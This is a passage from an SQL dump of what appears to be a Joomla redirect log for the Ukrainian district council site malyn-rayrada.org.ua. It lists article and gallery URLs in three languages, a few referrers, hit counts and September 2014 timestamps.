00:00:00',301),(4206,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1349:-31-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-09-22 11:21:49','0000-00-00 00:00:00',301),(4207,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1102:2013-10-03-08-08-33&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-09-22 11:22:00','0000-00-00 00:00:00',301),(4208,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1363:--qq&catid=11&Itemid=14&lang=uk','','','',8,0,'2014-09-22 11:23:11','0000-00-00 00:00:00',301),(4209,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1367:-lr-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',6,0,'2014-09-22 11:23:52','0000-00-00 00:00:00',301),(4210,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=986:-20-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-09-22 11:25:54','0000-00-00 00:00:00',301),(4211,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=5&layout=blog&Itemid=6&lang=en','','','',1,0,'2014-09-22 11:27:18','0000-00-00 00:00:00',301),(4212,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1329:2014-06-02-11-51-47&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-22 11:33:39','0000-00-00 00:00:00',301),(4213,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=5&Itemid=6&lang=en','','','',7,0,'2014-09-22 11:42:55','0000-00-00 00:00:00',301),(4214,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-22 12:58:20','0000-00-00 00:00:00',301),(4215,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1265:2014-04-01-11-43-46&catid=11&Itemid=14&lang=ru','','','',7,0,'2014-09-22 13:08:13','0000-00-00 00:00:00',301),(4216,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1331:2014-06-04-07-15-27&catid=59&Itemid=107&lang=en','','','',6,0,'2014-09-22 13:36:23','0000-00-00 00:00:00',301),(4217,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1311:-69-1941-1945-&catid=11&Itemid=14&lang=uk','','','',8,0,'2014-09-22 13:36:39','0000-00-00 00:00:00',301),(4218,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1025:-2011-2015-&catid=51:--19072013-&Itemid=92&lang=en','','','',1,0,'2014-09-22 14:31:06','0000-00-00 00:00:00',301),(4219,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=878:2012-12-21-16-59-28&catid=46&Itemid=85&lang=ru','','','',1,0,'2014-09-22 14:34:28','0000-00-00 00:00:00',301),(4220,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=3&layout=blog&Itemid=7&lang=uk','','','',2,0,'2014-09-22 14:55:17','0000-00-00 00:00:00',301),(4221,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-09-22 14:55:20','0000-00-00 00:00:00',301),(4222,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1215:-1200-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-22 14:55:21','0000-00-00 00:00:00',301),(4223,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1057:--22072013--2100-&catid=11&lang=uk','','','',8,0,'2014-09-22 15:06:01','0000-00-00 00:00:00',301),(4224,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1215:-1200-&catid=11&lang=en&Itemid=','','','',1,0,'2014-09-22 15:24:28','0000-00-00 00:00:00',301),(4225,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1167:--------l-r-------&catid=55&Itemid=96&lang=uk','','','',2,0,'2014-09-22 15:55:28','0000-00-00 00:00:00',301),(4226,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1185:2014-01-28-09-38-54&catid=56&Itemid=97&lang=en','','','',11,0,'2014-09-22 15:55:49','0000-00-00 00:00:00',301),(4227,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1238:2014-03-09-06-41-00&catid=11&lang=uk','','','',5,0,'2014-09-22 15:56:01','0000-00-00 00:00:00',301),(4228,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1150:2013-11-28-14-53-17&catid=54&Itemid=95&lang=uk','','','',2,0,'2014-09-22 16:00:24','0000-00-00 00:00:00',301),(4229,'http://www.malyn-rayrada.org.ua/index.php?catid=46:--21122012&id=881:2012-12-21-17-06-15&Itemid=85&lang=uk&option=com_content&view=article','','','',2,0,'2014-09-22 16:06:41','0000-00-00 00:00:00',301),(4230,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1370:31-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-09-22 16:12:31','0000-00-00 00:00:00',301),(4231,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1061:2013-07-29-08-58-16&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-09-22 16:15:36','0000-00-00 00:00:00',301),(4232,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1167:--------l-r-------&catid=55:--26122013-&Itemid=96&lang=ru','','','',3,0,'2014-09-22 16:15:45','0000-00-00 00:00:00',301),(4233,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1201:2014-01-31-07-43-11&catid=56:--03022014-&Itemid=97&lang=ru','','','',5,0,'2014-09-22 16:16:23','0000-00-00 00:00:00',301),(4234,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1238:2014-03-09-06-41-00&catid=11&lang=uk','','','',4,0,'2014-09-22 16:19:11','0000-00-00 00:00:00',301),(4235,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1150:2013-11-28-14-53-17&catid=54:--29112013-&Itemid=95&lang=ru','','','',3,0,'2014-09-22 16:19:34','0000-00-00 00:00:00',301),(4236,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1150:2013-11-28-14-53-17&catid=54&Itemid=95&lang=uk','','','',8,0,'2014-09-22 16:19:38','0000-00-00 00:00:00',301),(4237,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1150:2013-11-28-14-53-17&catid=54&Itemid=95&lang=ru','','','',8,0,'2014-09-22 16:31:43','0000-00-00 00:00:00',301),(4238,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1150:2013-11-28-14-53-17&catid=54:--29112013-&Itemid=95&lang=ru','','','',5,0,'2014-09-22 16:34:31','0000-00-00 00:00:00',301),(4239,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=929:2013-02-21-09-11-26&catid=47:-21022013-&Itemid=86&lang=ru','','','',1,0,'2014-09-22 16:38:18','0000-00-00 00:00:00',301),(4240,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1373:2014-08-07-11-39-57&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-22 16:41:23','0000-00-00 00:00:00',301),(4241,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1167:--------l-r-------&catid=55&Itemid=96&lang=ru','','','',3,0,'2014-09-22 16:54:18','0000-00-00 00:00:00',301),(4242,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&catid=11&Itemid=14&lang=uk','','','',12,0,'2014-09-22 17:09:05','0000-00-00 00:00:00',301),(4243,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1065:2013-08-14-12-52-50&catid=11&Itemid=14&lang=uk','','','',9,0,'2014-09-22 17:09:24','0000-00-00 00:00:00',301),(4244,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1057:--22072013--2100-&catid=11&lang=uk','','','',2,0,'2014-09-22 17:09:48','0000-00-00 00:00:00',301),(4245,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1167:--------l-r-------&catid=55:--26122013-&Itemid=96&lang=uk','','','',4,0,'2014-09-22 17:20:16','0000-00-00 00:00:00',301),(4246,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1237:-200-&catid=11&lang=uk','','','',5,0,'2014-09-22 17:25:31','0000-00-00 00:00:00',301),(4247,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/images/ajax-loader.gif','','http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15','',6,0,'2014-09-22 17:28:18','0000-00-00 00:00:00',301),(4248,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/images/black.png','','http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15','',6,0,'2014-09-22 17:28:20','0000-00-00 00:00:00',301),(4249,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=887:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-22 17:33:03','0000-00-00 00:00:00',301),(4250,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1067:2013-08-16-15-28-50&catid=52&Itemid=93&lang=ru','','','',3,0,'2014-09-22 17:33:34','0000-00-00 00:00:00',301),(4251,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1067:2013-08-16-15-28-50&catid=52:--16082013-&Itemid=93&lang=ru','','','',4,0,'2014-09-22 17:33:37','0000-00-00 00:00:00',301),(4252,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=853:2012-12-11-13-39-46&catid=32&Itemid=64&lang=en','','','',9,0,'2014-09-22 17:34:58','0000-00-00 00:00:00',301),(4253,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=946:-l-r-2011-2015-&catid=49:--12042013-&Itemid=88&lang=ru','','','',4,0,'2014-09-22 17:35:33','0000-00-00 00:00:00',301),(4254,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1090:-l-r-&catid=53:--25102013-&Itemid=94&lang=en','','','',3,0,'2014-09-22 17:35:37','0000-00-00 00:00:00',301),(4255,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1090:-l-r-&catid=53:--25102013-&Itemid=94&lang=ru','','','',2,0,'2014-09-22 17:35:41','0000-00-00 00:00:00',301),(4256,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1097:2013-09-25-08-35-50&catid=11&lang=en','','','',3,0,'2014-09-22 17:36:05','0000-00-00 00:00:00',301),(4257,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1103:2013-10-03-09-29-30&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-09-22 17:37:04','0000-00-00 00:00:00',301),(4258,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1104:-lr&catid=53&Itemid=94&lang=ru','','','',6,0,'2014-09-22 17:37:12','0000-00-00 00:00:00',301),(4259,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=881:2012-12-21-17-06-15&catid=46&Itemid=85&lang=en','','','',1,0,'2014-09-22 17:37:54','0000-00-00 00:00:00',301),(4260,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1109:2013-10-18-10-25-30&catid=11&lang=en','','','',5,0,'2014-09-22 17:38:15','0000-00-00 00:00:00',301),(4261,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1117:--------l-r----&catid=53&Itemid=94&lang=ru','','','',2,0,'2014-09-22 17:38:40','0000-00-00 00:00:00',301),(4262,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1117:--------l-r----&catid=53&Itemid=94&lang=uk','','','',5,0,'2014-09-22 17:38:59','0000-00-00 00:00:00',301),(4263,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1129:2013-11-06-13-36-25&catid=11&lang=en','','','',4,0,'2014-09-22 17:39:12','0000-00-00 00:00:00',301),(4264,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1130:2013-11-07-14-04-12&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-22 17:39:15','0000-00-00 00:00:00',301),(4265,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1147:2013-11-28-09-57-12&catid=11&lang=ru','','','',7,0,'2014-09-22 17:44:21','0000-00-00 00:00:00',301),(4266,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1104:------------------lr&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',7,0,'2014-09-22 17:45:34','0000-00-00 00:00:00',301),(4267,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=964:-2013-2017-&catid=49:--12042013-&Itemid=88&lang=uk','','','',12,0,'2014-09-22 17:51:53','0000-00-00 00:00:00',301),(4268,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=932:-l90-r&catid=47&Itemid=86&lang=ru','','','',7,0,'2014-09-22 17:55:00','0000-00-00 00:00:00',301),(4269,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=931:2013-02-21-09-14-48&catid=47:-21022013-&Itemid=86&lang=ru','','','',4,0,'2014-09-22 17:55:09','0000-00-00 00:00:00',301),(4270,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1150:2013-11-28-14-53-17&catid=54&Itemid=95&lang=ru','','','',1,0,'2014-09-22 17:55:25','0000-00-00 00:00:00',301),(4271,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1030:2013-06-17-06-46-59&catid=51:--19072013-&Itemid=92&lang=en','','','',10,0,'2014-09-22 17:55:42','0000-00-00 00:00:00',301),(4272,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1150:2013-11-28-14-53-17&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',7,0,'2014-09-22 17:59:59','0000-00-00 00:00:00',301),(4273,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=960:-19-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-22 18:00:31','0000-00-00 00:00:00',301),(4274,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1150:2013-11-28-14-53-17&catid=54:--29112013-&Itemid=95&lang=uk','','','',9,0,'2014-09-22 18:23:57','0000-00-00 00:00:00',301),(4275,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=960:-19-&catid=11&Itemid=14&lang=ru','','','',2,0,'2014-09-22 18:32:33','0000-00-00 00:00:00',301),(4276,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1170:2014-01-08-11-02-06&catid=11&lang=ru&Itemid=0','','http://yandex.ua/clck/jsredir?from=yandex.ua%3Byandsearch%3Bweb%3B%3B&text=&etext=455.JYizsJKwEyIH2Yf54PYYVqE35x30SVCFh2iu2qpPMaGNxqraQY55qVvsISgTROlN','',4,0,'2014-09-22 18:44:00','0000-00-00 00:00:00',301),(4277,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1104:-lr&catid=53&Itemid=94&lang=en','','','',2,0,'2014-09-22 18:44:02','0000-00-00 00:00:00',301),(4278,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=960:-19-&catid=11&Itemid=14&lang=uk','','','',4,0,'2014-09-22 18:46:21','0000-00-00 00:00:00',301),(4279,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1170:2014-01-08-11-02-06&catid=11&lang=en','','','',11,0,'2014-09-22 18:51:48','0000-00-00 00:00:00',301),(4280,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=960:-19-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-09-22 18:57:42','0000-00-00 00:00:00',301),(4281,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1101:2013-10-03-07-11-01&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-09-22 19:05:08','0000-00-00 00:00:00',301),(4282,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1113:2013-10-23-09-26-07&catid=53&Itemid=94&lang=ru','','','',8,0,'2014-09-22 19:12:37','0000-00-00 00:00:00',301),(4283,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1104:-lr&catid=53:--25102013-&Itemid=94&lang=en','','','',2,0,'2014-09-22 19:13:07','0000-00-00 00:00:00',301),(4284,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=960:-19-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-09-22 19:14:58','0000-00-00 00:00:00',301),(4285,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1104:------------------lr&catid=36&Itemid=70&lang=en','','','',3,0,'2014-09-22 19:30:17','0000-00-00 00:00:00',301),(4286,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1099:------------------l-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',11,0,'2014-09-22 19:34:59','0000-00-00 00:00:00',301),(4287,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=923:-17-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',7,0,'2014-09-22 19:36:06','0000-00-00 00:00:00',301),(4288,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1311:-69-1941-1945-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-22 19:42:30','0000-00-00 00:00:00',301),(4289,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=934:---------6---16112010-5---------------&catid=47&Itemid=86&lang=ru','','','',7,0,'2014-09-22 19:55:06','0000-00-00 00:00:00',301),(4290,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1233:2014-03-03-10-28-35&tmpl=component&print=1&layout=default&page=&lang=uk','','','',3,0,'2014-09-22 19:57:25','0000-00-00 00:00:00',301),(4291,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1099:------------------l-r&catid=36&Itemid=70&lang=ru','','','',4,0,'2014-09-22 20:01:57','0000-00-00 00:00:00',301),(4292,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1169:2014-01-08-07-30-47&catid=55&Itemid=96&lang=en','','','',1,0,'2014-09-22 20:08:22','0000-00-00 00:00:00',301),(4293,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1243:2014-03-17-07-32-47&catid=57&Itemid=98&lang=uk','','','',9,0,'2014-09-22 20:09:15','0000-00-00 00:00:00',301),(4294,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=4&Itemid=32&lang=en&limitstart=20','','','',9,0,'2014-09-22 20:15:05','0000-00-00 00:00:00',301),(4295,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1040:2013-07-01-14-27-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-22 20:17:35','0000-00-00 00:00:00',301),(4296,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=923:-17-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-09-22 20:23:33','0000-00-00 00:00:00',301),(4297,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1169:2014-01-08-07-30-47&catid=55:--26122013-&Itemid=96&lang=en','','','',4,0,'2014-09-22 20:31:30','0000-00-00 00:00:00',301),(4298,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1043:-------2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',10,0,'2014-09-22 20:35:45','0000-00-00 00:00:00',301),(4299,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',7,0,'2014-09-22 20:37:34','0000-00-00 00:00:00',301),(4300,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-09-22 20:41:43','0000-00-00 00:00:00',301),(4301,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=954:-19-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-09-22 20:42:30','0000-00-00 00:00:00',301),(4302,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1291:2014-04-23-11-37-34&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',13,0,'2014-09-22 20:42:36','0000-00-00 00:00:00',301),(4303,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=923:-17-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-09-22 20:52:18','0000-00-00 00:00:00',301),(4304,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1218:2014-02-21-15-02-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',11,0,'2014-09-22 20:52:34','0000-00-00 00:00:00',301),(4305,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=965:2013-03-14-10-56-03&catid=11&lang=uk&Itemid=','','','',5,0,'2014-09-22 21:02:33','0000-00-00 00:00:00',301),(4306,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=954:--19-----6-&catid=11&Itemid=14&lang=uk','','','',5,0,'2014-09-22 21:11:00','0000-00-00 00:00:00',301),(4307,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=954:-19-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-22 21:26:59','0000-00-00 00:00:00',301),(4308,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=957:199-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2014-09-22 21:30:52','0000-00-00 00:00:00',301),(4309,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=897:2013-01-18-07-40-55&catid=36&Itemid=70&lang=en','','','',3,0,'2014-09-22 21:30:58','0000-00-00 00:00:00',301),(4310,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=897:2013-01-18-07-40-55&catid=47:-21022013-&Itemid=86&lang=en','','','',6,0,'2014-09-22 21:31:06','0000-00-00 00:00:00',301),(4311,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1196:2014-01-30-14-12-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',12,0,'2014-09-22 21:35:53','0000-00-00 00:00:00',301),(4312,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1277:-2014-&catid=57&Itemid=98&lang=ru','','','',11,0,'2014-09-22 21:40:13','0000-00-00 00:00:00',301),(4313,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=954:--19-----6-&catid=11&Itemid=14&lang=ru','','','',2,0,'2014-09-22 21:40:46','0000-00-00 00:00:00',301),(4314,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1096:2013-09-24-13-34-16&catid=53&Itemid=94&lang=en','','','',7,0,'2014-09-22 21:55:03','0000-00-00 00:00:00',301),(4315,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=897:2013-01-18-07-40-55&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',3,0,'2014-09-22 22:07:36','0000-00-00 00:00:00',301),(4316,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1130:2013-11-07-14-04-12&catid=11&Itemid=14&lang=uk','','','',8,0,'2014-09-22 22:20:01','0000-00-00 00:00:00',301),(4317,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=1&Itemid=1&lang=ru','','','',6,0,'2014-09-22 22:29:44','0000-00-00 00:00:00',301),(4318,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=956:2013-03-07-14-51-33&catid=11&Itemid=14&lang=ru','','','',4,0,'2014-09-22 22:31:40','0000-00-00 00:00:00',301),(4319,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1201:2014-01-31-07-43-11&catid=56&Itemid=97&lang=uk','','','',9,0,'2014-09-22 22:35:50','0000-00-00 00:00:00',301),(4320,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=911:2013-01-22-13-27-41&catid=11&lang=uk&Itemid=','','','',8,0,'2014-09-22 22:43:48','0000-00-00 00:00:00',301),(4321,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1345:2014-06-17-07-48-07&catid=59:--20062014-&Itemid=107&lang=ru','','','',6,0,'2014-09-22 22:59:01','0000-00-00 00:00:00',301),(4322,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=975:-2012-2015-&catid=49&Itemid=88&lang=uk','','','',1,0,'2014-09-22 23:07:03','0000-00-00 00:00:00',301),(4323,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=6&Itemid=9&lang=en','','','',34,0,'2014-09-22 23:20:53','0000-00-00 00:00:00',301),(4324,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=975:-------------2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',5,0,'2014-09-22 23:24:15','0000-00-00 00:00:00',301),(4325,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=975:-------------2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',6,0,'2014-09-22 23:53:28','0000-00-00 00:00:00',301),(4326,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1157:-11-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',7,0,'2014-09-23 00:56:51','0000-00-00 00:00:00',301),(4327,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1194:-------------2012-2015--&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',20,0,'2014-09-23 01:00:05','0000-00-00 00:00:00',301),(4328,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1375:-33-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-09-23 01:17:35','0000-00-00 00:00:00',301),(4329,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1345:2014-06-17-07-48-07&catid=59:--20062014-&Itemid=107&lang=en','','','',12,0,'2014-09-23 01:48:59','0000-00-00 00:00:00',301),(4330,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=986:-20---&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-23 02:20:00','0000-00-00 00:00:00',301),(4331,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=979:2013-03-29-09-18-27&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-09-23 02:22:12','0000-00-00 00:00:00',301),(4332,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=892:2013-01-08-13-26-18&catid=11&lang=en','','','',1,0,'2014-09-23 02:25:33','0000-00-00 00:00:00',301),(4333,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=892:2013-01-08-13-26-18&catid=11&lang=en&Itemid=','','','',2,0,'2014-09-23 02:53:50','0000-00-00 00:00:00',301),(4334,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1035:2013-06-25-09-55-31&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',6,0,'2014-09-23 02:56:29','0000-00-00 00:00:00',301),(4335,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=892:2013-01-08-13-26-18&catid=11&lang=en&Itemid=0','','','',1,0,'2014-09-23 03:09:29','0000-00-00 00:00:00',301),(4336,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=892:2013-01-08-13-26-18&catid=11&lang=en&Itemid=','','','',1,0,'2014-09-23 03:09:32','0000-00-00 00:00:00',301),(4337,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1359:2014-07-07-08-13-48&catid=11&Itemid=14&lang=ru','','','',6,0,'2014-09-23 03:18:09','0000-00-00 00:00:00',301),(4338,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1107:c-&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-09-23 03:20:48','0000-00-00 00:00:00',301),(4339,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1107:c-&catid=11&lang=uk','','','',2,0,'2014-09-23 03:25:07','0000-00-00 00:00:00',301),(4340,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1286:2014-04-23-06-48-27&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',2,0,'2014-09-23 03:28:01','0000-00-00 00:00:00',301),(4341,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=5:2010-06-05-12-51-34&layout=blog&Itemid=6&lang=uk','','','',5,0,'2014-09-23 03:34:21','0000-00-00 